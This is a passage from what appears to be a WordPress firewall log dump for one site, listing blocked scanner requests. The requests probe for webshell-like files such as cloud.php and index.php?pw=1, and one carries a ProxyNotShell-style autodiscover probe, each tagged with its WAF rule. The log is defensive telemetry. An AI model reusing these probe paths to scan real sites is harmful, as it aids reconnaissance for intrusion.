User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy9jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(135024,1700547585.409391,1700547585.387400,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/colors/coffee/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvY29mZmVlL2Nsb3VkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133455,1699888595.668423,1699888595.659200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/translations.php','http://eckankar-colorado.org/wp-includes/pomo/translations.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vdHJhbnNsYXRpb25zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135037,1700563999.840033,1700563999.801600,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(135040,1700582822.303297,1700582822.278400,0x00000000000000000000FFFF29D8BCA2,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(135023,1700547571.492832,1700547571.460400,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvY2xvdWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(135022,1700547578.138676,1700547578.115200,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/img/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltZy9jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133454,1699888596.346476,1699888596.337700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/class-wp-rest-request.php','http://eckankar-colorado.org/wp-includes/rest-api/class-wp-rest-request.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2NsYXNzLXdwLXJlc3QtcmVxdWVzdC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(135038,1700564310.871504,1700564310.783800,0x00000000000000000000FFFF6BAAE615,0,403,0,0,0,'https://173.231.231.205/autodiscover/autodiscover.json?%40zdi%2FPowershell=',NULL,'Mozilla/5.0 zgrab/0.x','blocked:waf','Exchange Proxy(Not?)Shell CVE-2022–41040 and CVE-2022–41082','{\"learningMode\":0,\"failedRules\":\"511\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"path\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"category\":\"rce\",\"ssl\":1}'),(135021,1700547564.360351,1700547564.336900,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/css/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nzcy9jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(135020,1700547553.874366,1700547553.836200,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vY2xvdWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133453,1699888596.683377,1699888596.674700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/class-wp-rest-response.php','http://eckankar-colorado.org/wp-includes/rest-api/class-wp-rest-response.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2NsYXNzLXdwLXJlc3QtcmVzcG9uc2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(135019,1700547546.288018,1700547546.248900,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nsb3VkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135039,1700576530.272088,1700576530.232700,0x00000000000000000000FFFF36246C95,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/index.php?pw=1','eckankar-colorado.org','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) colonel Chrome/196.3.1597.530 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgY29sb25lbCBDaHJvbWUvMTk2LjMuMTU5Ny41MzAgU2FmYXJpLzUzNy4zNg==\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135014,1700537865.692100,1700537865.652900,0x00000000000000000000FFFF592E4204,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/index.php?pw=1','eckankar-colorado.org','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) colonel Chrome/196.3.1597.530 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgY29sb25lbCBDaHJvbWUvMTk2LjMuMTU5Ny41MzAgU2FmYXJpLzUzNy4zNg==\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133452,1699888597.023619,1699888597.014800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/class-wp-rest-server.php','http://eckankar-colorado.org/wp-includes/rest-api/class-wp-rest-server.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2NsYXNzLXdwLXJlc3Qtc2VydmVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135006,0.000000,1700519446.388246,0x00000000000000000000FFFFB4FE496A,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','http://restaurantinteriordesign.eu/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0','loginFailInvalidUsername',NULL,NULL),(135007,1700521740.714596,1700521740.676000,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(135005,1700518033.262686,1700518033.239500,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/old1',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L29sZDE=\",\"category\":\"brute-force\",\"ssl\":1}'),(133451,1699888597.706119,1699888597.683400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-nav-menu-widget.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-nav-menu-widget.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3AtbmF2LW1lbnUtd2lkZ2V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135011,1700527771.777953,1700527771.754600,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-content/admin.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvYWRtaW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(135004,1700518033.553994,1700518033.530700,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/old2',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L29sZDI=\",\"category\":\"brute-force\",\"ssl\":1}'),(133450,1699888598.045369,1699888598.036600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-archives.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-archives.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LWFyY2hpdmVzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135008,1700522388.623800,1700522388.584800,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/nf_tracking.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L25mX3RyYWNraW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135003,1700518033.844231,1700518033.820500,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/OLDSITE',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L09MRFNJVEU=\",\"category\":\"brute-force\",\"ssl\":1}'),(135041,1700582814.179421,1700582814.129700,0x00000000000000000000FFFF29D8BCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/admin.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvYWRtaW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(135002,1700518034.203578,1700518034.179500,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/beta',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2JldGE=\",\"category\":\"brute-force\",\"ssl\":1}'),(135001,1700518034.880382,1700518034.840000,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/staging/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0YWdpbmcv\",\"category\":\"brute-force\",\"ssl\":1}'),(133449,1699888598.384627,1699888598.374800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-block.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-block.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 